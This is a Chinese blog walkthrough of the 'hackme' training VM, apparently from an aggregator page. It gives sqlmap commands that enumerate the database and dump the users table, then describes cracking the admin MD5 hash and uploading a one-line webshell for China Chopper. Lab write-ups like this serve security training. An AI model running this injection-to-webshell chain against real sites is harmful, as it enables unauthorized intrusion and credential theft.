当前位置: 首页 > news >正文

hackme靶机通关攻略

news 2025/8/5 8:05:41

用nmap扫描端口

进入靶场后在首页注册登录

登录后进行抓包

复制下来保存为txt文档,使用sqlmap进行注入

查数据库(这里是在桌面打开的终端,因为txt文档我是建在桌面的)

sqlmap -r \3.txt --current-db

查表

sqlmap -r \3.txt -D webapphacking --tables

查数据

sqlmap -r \3.txt -D webapphacking -T users --dump

使用管理员密码登录,(这里的密码是md5加密的,所以需要我们进行md5解密)

登录成功后我们写一个一句话木马上去

上传成功后用菜刀进行连接


http://www.mrgr.cn/news/19078.html

相关文章:

  • pikachu文件包含漏洞靶场(本地文件包含+远程文件包含关卡)
  • ​yum安装/更新时报错:SyntaxError: invalid syntax​
  • Linux学习-虚拟化平台安装和使用
  • 操作符的优先级和结合性
  • Java-数据结构-链表-LinkedList(二)|ू・ω・` )
  • 【前端面试】leetcode树javascript
  • 【IPV6从入门到起飞】2-1 获取你的IPV6(手机、CPE等)
  • opencv简单介绍
  • ARM汇编
  • 一阶微分方程的解的存在唯一性定理
  • BaseCTF-week2-wp
  • zdppy+vue3+onlyoffice文档管理系统实战 20240903 上课笔记 登录功能完成
  • 【C++】C++智能指针详解
  • 函数的力量:掌握Python中的“返回值”艺术
  • 【60天备战软考高级系统架构设计师——第七天:架构风格】
  • kafka基础知识(持续更新中~)
  • 单端输入与差分输入
  • 标准库标头 <optional> (C++17)学习之optional
  • redis之缓存淘汰策略
  • tcp udp